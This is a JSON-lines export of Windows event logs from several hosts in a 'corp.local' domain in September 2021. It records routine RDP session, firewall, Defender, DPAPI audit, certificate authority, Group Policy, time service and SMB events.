{"EventTime":"2021-09-21T12:21:57.702883+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":162,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":"0xa0400","TaskValue":4,"OpcodeValue":19,"RecordNumber":23829,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":1188,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"The client supports version 0xA0400 of the RDP graphics protocol, client mode: 2, AVC available: 0, Initial profile: 2. Server: IT01","Category":"RemoteFX module","Opcode":"Runtime","ClientMode":"2","AvcEnabled":"0","ProfileIdNum":"2","ServerName":"IT01","EventReceivedTime":"2021-09-21T14:23:58.874108+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:21:57.495389+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":100,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":15,"RecordNumber":23815,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":1332,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"The server has confirmed that the client's multi-transport capability.","Category":"RemoteFX module","Opcode":"EstablishConnection","EventReceivedTime":"2021-09-21T14:23:58.858489+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:21:57.685235+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":169,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":19,"RecordNumber":23824,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":1484,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"The client operating system type is (6, 0).  Server: IT01","Category":"RemoteFX module","Opcode":"Runtime","MajorType":"6","MinorType":"0","ServerName":"IT01","EventReceivedTime":"2021-09-21T14:23:58.874108+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:29:22.424178+05:45","Hostname":"IT01.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":2003,"SourceName":"Microsoft-Windows-Windows Firewall With Advanced Security","ProviderGuid":"{D1BC9AFF-2ABF-4D71-9146-ECB2A986EB85}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":11590,"ExecutionProcessID":1552,"ExecutionThreadID":5832,"Channel":"Microsoft-Windows-Windows Firewall With Advanced Security/Firewall","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"A Windows Defender Firewall setting in the Public profile has changed.\r\nNew Setting:\r\n\tType:\tEnable Windows Defender Firewall\r\n\tValue:\tYes\r\n\tModifying User:\tS-1-5-18\r\n\tModifying Application:\tC:\\Windows\\System32\\SecurityHealthService.exe","Opcode":"Info","Profiles":"4","SettingType":"1","SettingValueSize":"4","SettingValue":"01000000","SettingValueString":"Yes","Origin":"1","ModifyingUser":"S-1-5-18","ModifyingApplication":"C:\\Windows\\System32\\SecurityHealthService.exe","EventReceivedTime":"2021-09-21T14:23:59.452234+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:21:57.392635+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":101,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":16,"RecordNumber":23803,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":1484,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"The network characteristics detection function has been disabled because of Reason Code: 2(Server Configuration)..","Category":"RemoteFX module","Opcode":"NetworkDetect","ReasonString":"Reason Code: 2(Server Configuration).","EventReceivedTime":"2021-09-21T14:23:58.842866+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:21:57.393161+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":71,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":13,"RecordNumber":23809,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":3744,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"The connection RDP-Tcp#7 uses display driver RDPUDD.","Category":"RemoteFX module","Opcode":"RCMProtocolImpl","ConnectionName":"RDP-Tcp#7","DisplayDriverName":"RDPUDD","EventReceivedTime":"2021-09-21T14:23:58.858489+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:21:59.052279+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":168,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":11,"RecordNumber":23845,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":3768,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"The resolution requested by the client: Monitor 0: (2880, 1800), origin: (0, 0). Server: IT01","Category":"RemoteFX module","Opcode":"Initialize","MonitorNum":"0","MonitorWidth":"2880","MonitorHeight":"1800","MonitorX":"0","MonitorY":"0","ServerName":"IT01","EventReceivedTime":"2021-09-21T14:23:58.967860+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:29:22.424241+05:45","Hostname":"IT01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4950,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13571,"OpcodeValue":0,"RecordNumber":4046613,"ActivityID":"{1861A8E2-AEB2-0000-61A9-6118B2AED701}","ExecutionProcessID":640,"ExecutionThreadID":2716,"Channel":"Security","Message":"A Windows Firewall setting was changed.\r\n\t\r\nChanged Profile:\tPublic\r\n\r\nNew Setting:\r\n\tType:\tEnable Windows Defender Firewall\r\n\tValue:\tYes","Category":"MPSSVC Rule-Level Policy Change","Opcode":"Info","ProfileChanged":"Public","SettingType":"Enable Windows Defender Firewall","SettingValue":"Yes","EventReceivedTime":"2021-09-21T14:23:59.452234+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:06:23.603471+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":228,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":19,"RecordNumber":23867,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":1428,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"Disconnect trace:'calling spGfxPlugin->PreDisconnect()' in CUMRDPConnection::PreDisconnect at 4719 err=[0xc]","Category":"RemoteFX module","Opcode":"Runtime","ComponentName":"CUMRDPConnection","ErrorCode":"12","EventReceivedTime":"2021-09-21T14:24:00.327235+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-15T11:19:43.129626+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":6041,"SourceName":"LsaSrv","ProviderGuid":"{199FE037-2B82-40A9-82AC-E1D46C792B99}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":75441,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"A CredSSP authentication to TERMSRV/192.168.2.47 failed to negotiate a common protocol version.  The remote host offered version 3 which is not permitted by Encryption Oracle Remediation.\r\n\r\nSee https://go.microsoft.com/fwlink/?linkid=866660 for more information.","Opcode":"Info","Data":"TERMSRV/192.168.2.47","Data_1":"3","EventReceivedTime":"2021-09-15T11:19:43.442226+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-15T11:19:52.786785+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4692,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13314,"OpcodeValue":0,"RecordNumber":190631694,"ExecutionProcessID":492,"ExecutionThreadID":1344,"Channel":"Security","Message":"Backup of data protection master key was attempted.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2569713578-3403938347-3732993993-1112\r\n\tAccount Name:\t\tLucy\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x14D52A9E\r\n\r\nKey Information:\r\n\tKey Identifier:\te1327e5a-b8c2-4750-9140-bd85abc8e7ef\r\n\tRecovery Server:\t\r\n\tRecovery Key ID:\tfdb4b563-caa2-4306-91d4-ceccc90f4b95\r\n\r\nStatus Information:\r\n\tStatus Code:\t0x0","Category":"DPAPI Activity","Opcode":"Info","SubjectUserSid":"S-1-5-21-2569713578-3403938347-3732993993-1112","SubjectUserName":"Lucy","SubjectDomainName":"CORP","SubjectLogonId":"0x14d52a9e","MasterKeyId":"e1327e5a-b8c2-4750-9140-bd85abc8e7ef","RecoveryKeyId":"fdb4b563-caa2-4306-91d4-ceccc90f4b95","FailureReason":"0x0","EventReceivedTime":"2021-09-15T11:19:54.458681+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-15T11:54:56.372339+05:45","Hostname":"IT03.corp.local","Keywords":"2305843009213759488","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":28115,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":28141,"OpcodeValue":0,"RecordNumber":7575,"ExecutionProcessID":4488,"ExecutionThreadID":3124,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"IT03","AccountName":"Administrator","UserID":"S-1-5-21-3281079745-558096271-899791025-500","AccountType":"User","Message":"Shortcut for application Wireshark with ID {6D809377-6AF0-444B-8957-A3773F02200E}\\Wireshark\\Wireshark.exe and flags 0x8030 is added to app resolver cache.","Opcode":"Info","Name":"Wireshark","AppID":"{6D809377-6AF0-444B-8957-A3773F02200E}\\Wireshark\\Wireshark.exe","Flags":"32816","EventReceivedTime":"2021-09-15T11:54:57.792859+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-15T11:20:06.083287+05:45","Hostname":"DC01.corp.local","Keywords":"2305843009213759488","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":28116,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":28142,"OpcodeValue":0,"RecordNumber":12648,"ExecutionProcessID":5388,"ExecutionThreadID":1580,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"CORP","AccountName":"Lucy","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1112","AccountType":"User","Message":"Shortcut for application Certification Authority with ID {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\certsrv.msc and flags 0x38 is removed from app resolver cache.","Opcode":"Info","Name":"Certification Authority","AppID":"{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\certsrv.msc","Flags":"56","EventReceivedTime":"2021-09-15T11:20:06.848961+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-15T11:20:06.286474+05:45","Hostname":"DC01.corp.local","Keywords":"2305843009213759488","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":28123,"SourceName":"Microsoft-Windows-Shell-Core","ProviderGuid":"{30336ED4-E327-447C-9DE0-51B652C86108}","Version":0,"TaskValue":28135,"OpcodeValue":0,"RecordNumber":12650,"ExecutionProcessID":5388,"ExecutionThreadID":1580,"Channel":"Microsoft-Windows-Shell-Core/Operational","Domain":"CORP","AccountName":"Lucy","UserID":"S-1-5-21-2569713578-3403938347-3732993993-1112","AccountType":"User","Message":"Updated start screen layout: 65 items initially; 2 added; 2 removed; 2 updated. Cache contains 2 applications.","Opcode":"Info","ItemsExisting":"65","ItemsAdded":"2","ItemsRemoved":"2","ItemsUpdated":"2","ItemsCached":"65","EventReceivedTime":"2021-09-15T11:20:06.848961+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-15T11:20:36.234040+05:45","Hostname":"DC01.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1530,"SourceName":"Microsoft-Windows-User Profiles Service","ProviderGuid":"{89B1E9F0-5AFF-44A6-9B44-0A07A7CE5845}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":119227,"ExecutionProcessID":880,"ExecutionThreadID":6012,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Windows detected your registry file is still in use by other applications or services. The file will be unloaded now. The applications or services that hold your registry file may not function properly afterwards. No user action is required.  \r\n\r\n DETAIL - \r\n 1 user registry handles leaked from \\Registry\\User\\S-1-5-21-2569713578-3403938347-3732993993-1112:\nProcess 880 (\\Device\\HarddiskVolume2\\Windows\\System32\\svchost.exe) has opened key \\REGISTRY\\USER\\S-1-5-21-2569713578-3403938347-3732993993-1112\n","Opcode":"Info","Detail":"1 user registry handles leaked from \\Registry\\User\\S-1-5-21-2569713578-3403938347-3732993993-1112:\nProcess 880 (\\Device\\HarddiskVolume2\\Windows\\System32\\svchost.exe) has opened key \\REGISTRY\\USER\\S-1-5-21-2569713578-3403938347-3732993993-1112\n","EventReceivedTime":"2021-09-15T11:20:37.155829+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-15T11:20:36.000000+05:45","Hostname":"DC01.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":9009,"SourceName":"Desktop Window Manager","TaskValue":0,"RecordNumber":119229,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The Desktop Window Manager has exited with code (0xd00002fe)","EventData":"<Data>0xd00002fe</Data>","EventReceivedTime":"2021-09-15T11:20:37.155829+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-15T11:54:56.215179+05:45","Hostname":"IT03.corp.local","Keywords":"9259400833873739776","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":1076,"SourceName":"User32","ProviderGuid":"{B0AA8734-56F7-41CC-B2F4-DE228E98B946}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":107580,"ExecutionProcessID":3032,"ExecutionThreadID":1092,"Channel":"System","Domain":"IT03","AccountName":"Administrator","UserID":"S-1-5-21-3281079745-558096271-899791025-500","AccountType":"User","Message":"The reason supplied by user IT03\\Administrator for the last unexpected shutdown of this computer is: Other (Unplanned)\r\n Reason Code: 0xa000000\r\n Problem ID: \r\n Bugcheck String: \r\n Comment: \n","param1":"Other (Unplanned)","param2":"0xa000000","param5":"\n","param6":"IT03\\Administrator","EventReceivedTime":"2021-09-15T11:54:56.777626+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-15T11:55:13.605493+05:45","Hostname":"IT03.corp.local","Keywords":"9223372036854775808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":10,"SourceName":"Microsoft-Windows-Security-Mitigations","ProviderGuid":"{FAE10392-F0AF-4AC0-B8FF-9F4D920C3CDF}","Version":0,"TaskValue":5,"OpcodeValue":0,"RecordNumber":407,"ExecutionProcessID":6288,"ExecutionThreadID":6292,"Channel":"Microsoft-Windows-Security-Mitigations/KernelMode","Domain":"IT03","AccountName":"Administrator","UserID":"S-1-5-21-3281079745-558096271-899791025-500","AccountType":"User","Message":"Process '\\Device\\HarddiskVolume2\\Users\\Administrator\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\83.238.200\\software_reporter_tool.exe' (PID 6288) was blocked from making system calls to Win32k.sys.","Opcode":"Info","ProcessPathLength":"130","ProcessPath":"\\Device\\HarddiskVolume2\\Users\\Administrator\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\83.238.200\\software_reporter_tool.exe","ProcessCommandLineLength":"340","ProcessCommandLine":"\"c:\\users\\administrator\\appdata\\local\\google\\chrome\\user data\\swreporter\\83.238.200\\software_reporter_tool.exe\" --enable-crash-reporting --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_5036_YDTKZHYDCWQGEOBR\" --sandboxed-process-id=3 --init-done-notifier=1040 --sandbox-mojo-pipe-token=13523599040654431274 --mojo-platform-channel-handle=1036","CallingProcessId":"6288","CallingProcessCreateTime":"2021-09-15T06:10:13.543692100Z","CallingProcessStartKey":"12384898975269366","CallingProcessSignatureLevel":"0","CallingProcessSectionSignatureLevel":"0","CallingProcessProtection":"0","CallingThreadId":"6292","CallingThreadCreateTime":"2021-09-15T06:10:13.543696100Z","EventReceivedTime":"2021-09-15T11:55:15.587670+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-14T10:42:58.535250+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5004,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":22140,"ExecutionProcessID":3468,"ExecutionThreadID":4088,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus Real-time Protection feature configuration has changed.\r\n \tFeature: Network Inspection System\r\n \tConfiguration: 0","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2107.4","Feature Name":"Network Inspection System","Configuration":"0","Feature ID":"9","EventReceivedTime":"2021-09-14T10:43:00.026328+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-14T10:43:22.841945+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":2014,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":22145,"ExecutionProcessID":2080,"ExecutionThreadID":1072,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Microsoft Defender Antivirus platform update to 4.18.2108.7 has succeeded.\r\n","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Product Version":"4.18.2108.7","EventReceivedTime":"2021-09-14T10:43:25.354955+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-14T10:56:20.880695+05:45","Hostname":"IT03.corp.local","Keywords":"9223372036854775808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":94,"SourceName":"Microsoft-Windows-CertificationAuthority","ProviderGuid":"{6A71D062-9AFE-4F35-AD08-52134F85DFB9}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":28170,"ExecutionProcessID":2448,"ExecutionThreadID":2452,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Active Directory Certificate Services CORP-IT03-CA can not open the certificate store at CN=NTAuthCertificates,CN=Public Key Services,CN=Services in the Active Directory's configuration container.","Opcode":"Info","CACommonName":"CORP-IT03-CA","EventReceivedTime":"2021-09-14T10:56:43.675112+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-14T10:56:17.839910+05:45","Hostname":"IT03.corp.local","Keywords":"9223372036854775808","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":91,"SourceName":"Microsoft-Windows-CertificationAuthority","ProviderGuid":"{6A71D062-9AFE-4F35-AD08-52134F85DFB9}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":28169,"ExecutionProcessID":2448,"ExecutionThreadID":2452,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Could not connect to the Active Directory.  Active Directory Certificate Services will retry when processing requires Active Directory access.","Opcode":"Info","EventReceivedTime":"2021-09-14T10:56:43.675112+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-14T10:55:57.837505+05:45","Hostname":"IT03.corp.local","Keywords":"9259400833873739776","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7042,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":107272,"ExecutionProcessID":612,"ExecutionThreadID":608,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The lmhosts service was successfully sent a stop control.\r\n\r\n The reason specified was: 0x40030011 [Operating System: Network Connectivity (Planned)]\r\n\r\n Comment: None","param1":"lmhosts","param2":"stop","param3":"0x40030011","param4":"Operating System: Network Connectivity (Planned)","param5":"None","EventReceivedTime":"2021-09-14T10:56:47.225759+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-14T10:57:25.063673+05:45","Hostname":"IT03.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1502,"SourceName":"Microsoft-Windows-GroupPolicy","ProviderGuid":"{AEA1B4FA-97D1-45F2-A64C-4D69FFFD92C9}","Version":0,"TaskValue":0,"OpcodeValue":1,"RecordNumber":107337,"ActivityID":"{F3A314BA-5BC6-4EE0-B4B4-70668B78E353}","ExecutionProcessID":1520,"ExecutionThreadID":4308,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The Group Policy settings for the computer were processed successfully. New settings from 8 Group Policy objects were detected and applied.","Opcode":"Start","SupportInfo1":"1","SupportInfo2":"4213","ProcessingMode":"1","ProcessingTimeInMilliseconds":"48437","DCName":"\\\\DC01.corp.local","NumberOfGroupPolicyObjects":"8","EventReceivedTime":"2021-09-14T10:57:26.155003+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-14T10:57:25.558419+05:45","Hostname":"IT03.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4954,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13571,"OpcodeValue":0,"RecordNumber":40710496,"ActivityID":"{C4CABCCB-A926-0000-82BE-CAC426A9D701}","ExecutionProcessID":632,"ExecutionThreadID":2204,"Channel":"Security","Message":"Group Policy settings for Windows Firewall were changed, and the new settings were applied.","Category":"MPSSVC Rule-Level Policy Change","Opcode":"Info","EventData":"","EventReceivedTime":"2021-09-14T10:57:26.186262+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-14T10:57:25.557640+05:45","Hostname":"IT03.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":2008,"SourceName":"Microsoft-Windows-Windows Firewall With Advanced Security","ProviderGuid":"{D1BC9AFF-2ABF-4D71-9146-ECB2A986EB85}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":4024,"ExecutionProcessID":1404,"ExecutionThreadID":1812,"Channel":"Microsoft-Windows-Windows Firewall With Advanced Security/Firewall","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"Windows Defender Firewall Group Policy settings have changed. The new settings have been applied","Opcode":"Info","EventData":"","EventReceivedTime":"2021-09-14T10:57:27.280452+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-14T15:32:33.713341+05:45","Hostname":"DC01.corp.local","Keywords":"9223372036854775808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":47,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":644979,"ExecutionProcessID":940,"ExecutionThreadID":384,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"Time Provider NtpClient: No valid response has been received from manually configured peer 1.uk.pool.ntp.org,0x1 after 8 attempts to contact it. This peer will be discarded as a time source and NtpClient will attempt to discover a new peer with this DNS name. The error was: The peer is unreachable. ","Opcode":"Info","ManualPeer":"1.uk.pool.ntp.org,0x1","ErrorMessage":"The peer is unreachable. ","EventReceivedTime":"2021-09-14T15:32:34.822781+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-07T11:54:52.544999+05:45","Hostname":"DC01.corp.local","Keywords":"288230376151711808","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":30807,"SourceName":"Microsoft-Windows-SMBClient","ProviderGuid":"{988C59C5-0A1C-45B6-A555-0C62276E327D}","Version":2,"TaskValue":0,"OpcodeValue":0,"RecordNumber":1285,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Microsoft-Windows-SmbClient/Connectivity","Message":"The connection to the share was lost.\r\n\r\nError: The transport connection is now disconnected.\r\n\r\nShare name: \\winserver2019\\IPC$\r\nSession ID: 0xA40000000035\r\nTree ID: 0x1\r\n\r\nGuidance:\r\nIf the server is a Windows Failover Cluster file server, then this message occurs when the file share moves between cluster nodes. There should also be an anti-event 30808 indicating the session to the server was re-established. If the server is not a failover cluster, it is likely that the server was previously online, but it is now inaccessible over the network.","Opcode":"Info","Status":"3221225996","SessionId":"180319906955317","TreeId":"1","ServerNameLength":"19","ServerName":"\\winserver2019\\IPC$","AddressLength":"0","EventReceivedTime":"2021-09-07T11:54:54.310823+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
